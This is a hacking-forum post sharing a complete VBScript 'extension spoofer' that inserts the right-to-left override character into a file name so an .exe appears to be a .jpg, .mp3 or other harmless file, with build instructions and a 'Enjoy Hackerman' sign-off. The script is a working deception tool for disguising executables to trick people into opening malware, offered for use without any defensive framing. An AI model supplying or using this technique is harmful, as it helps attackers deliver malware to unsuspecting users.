Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   446

Free Extension Spoofer - Make EXE File Looks Like Any File You Want

by lunatech - 23 September, 2022 - 02:17 PM
This post is by a banned member (lunatech) - Unhide
This post is by a banned member (bumba123321) - Unhide
60
Posts
0
Threads
3 Years of service
#2
(23 September, 2022 - 02:17 PM)lunatech Wrote: Show More
Hi guys, this method which includes script is a simple RTLO extension spoofing

It allows you to make your .exe file look like any file you want, it is a only a visual trick, you can't send it as a .jpg for example.

How to build it : open the notepad, paste the code, save as .vbs file.
 
Code:
Call Spoof
Sub Spoof()
dim filePath,fileName,exten,FileLen,revExten,dest,NewFileName
set fs = CreateObject("Scripting.FileSystemObject")
filePath=inputbox("Enter The FilePath")
exten=inputbox("Enter the Extension to spoof" & vbCrlf & _
"Example : .jpg, .mp3 , .avi , etc..")
fileName=fs.GetFileName(filepath)
filePath=fs.GetParentFolderName(filepath)
FileLen=Len(fileName)-4
Dim spclChar
spclChar = ChrW(8238)
revExten=StrReverse(exten)
NewFileName=inputbox("Enter the new file name max 5 chars")
dest=NewFileName & spclChar & revExten & mid(fileName,FileLen+2)

fs.copyFile filePath & "\" & Filename,filePath & "\" & dest
msgbox "Extension Spoofed Successfully!!",vbInformation
end sub
 
Enjoy Hackerman

dvfvd

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)